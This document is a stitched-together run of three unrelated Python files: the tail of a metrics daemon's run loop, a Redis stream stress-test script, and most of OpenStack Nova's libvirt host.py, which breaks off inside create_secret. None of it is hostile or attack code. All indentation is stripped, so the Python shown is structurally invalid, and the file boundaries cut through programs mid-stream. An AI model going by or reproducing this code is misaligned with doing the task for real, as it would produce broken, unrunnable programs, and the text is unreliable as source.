class App(Daemon):
def run(self):
backends = ('OddEye', 'InfluxDB', 'KairosDB', 'OpenTSDB')
self.hast = 1
if tsdb_type in backends:
def run_normal():
while True:
run_scripts()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(run_scripts))
run_shell_scripts()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(run_shell_scripts))
if self.hast % 25 == 0:
gc.collect()
self.hast = 1
else:
self.hast += 1
time.sleep(cron_interval)
#lib.puylogger.print_message('----------------------------------------')
def run_cache():
while True:
upload_cache()
if lib.puylogger.debug_log:
lib.puylogger.print_message(str(upload_cache))
time.sleep(cron_interval)
cache = threading.Thread(target=run_cache, name='Run Cache')
cache.daemon = True
cache.start()
run_normal()
else:
while True:
run_scripts()
run_shell_scripts()
time.sleep(cron_interval)
if __name__ == "__main__":
daemon = App(pid_file)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
else:
print ("Unknown command")
sys.exit(2)
sys.exit(0)
else:
print ("usage: %s start|stop|restart" % sys.argv[0])
sys.exit(2)
|
stress_test_streaming.py
|
from stress_test import *
import time
ITERATION = 10
def push_to_redis_stream(image_dicts):
for image in image_dicts:
start_time = time.time()
DB.xadd(settings.IMAGE_STREAMING, image)
print("* Push to Redis %d ms" % int(round((time.time() - start_time) * 1000)))
def stress_test_stream(image_dicts):
for _ in range(ITERATION):
for i in range(0, NUM_REQUESTS):
# start a new thread to call the API
t = Thread(target=push_to_redis_stream, args=(image_dicts,))
t.daemon = True
t.start()
time.sleep(SLEEP_COUNT)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--img_path', help="Path where the images are stored")
args = parser.parse_args()
images = prepare_images(args.img_path)
stress_test_stream(images)
time.sleep(3)
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import inspect
import operator
import os
import socket
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
# Return a list of just the classes, filtering out libvirtError because
# we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception('Exception handling connection event')
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception("Connection to libvirt failed: %s", ex)
payload = {'ip': CONF.my_ip, 'method': '_connect', 'reason': ex}
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
def get_guest(self, instance):
"""Retrieve libvirt guest object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
return libvirt_guest.Guest(self._get_domain(instance))
def _get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
:param instance: a nova.objects.Instance object
:returns: a libvirt.Domain object
:raises exception.InstanceNotFound: The domain was not found
:raises exception.InternalError: A libvirt error occurred
"""
try:
conn = self.get_connection()
return conn.lookupByUUIDString(instance.uuid)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance.uuid)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance.name,
'error_code': error_code,
'ex': ex})
raise exception.InternalError(msg)
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
# listAllDomains() returns <list of virDomain>, not <virDomain>, so
# tpool.Proxy's autowrap won't catch it. We need to wrap the
# contents of the list we return.
alldoms = (self._wrap_libvirt_proxy(dom)
for dom in self.get_connection().listAllDomains(flags))
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
:returns: set of online CPUs, raises libvirtError on error
"""
cpus, cpu_map, online = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recoded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None, uuid=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd', 'volume', 'vtpm'.
'rbd' will be converted to 'ceph'. 'vtpm' secrets
are private and ephemeral; others are not.
:param usage_id: name of resource in secret
:param password: optional secret value to set
:param uuid: optional UUID of the secret; else one is generated by
libvirt
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = usage_type == 'vtpm'
secret_conf.private = usage_type == 'vtpm'
secret_conf.usage_id = usage_id
secret_conf.uuid = uuid
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
elif usage_type == 'vtpm':
secret_conf.usage_type = 'vtpm'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
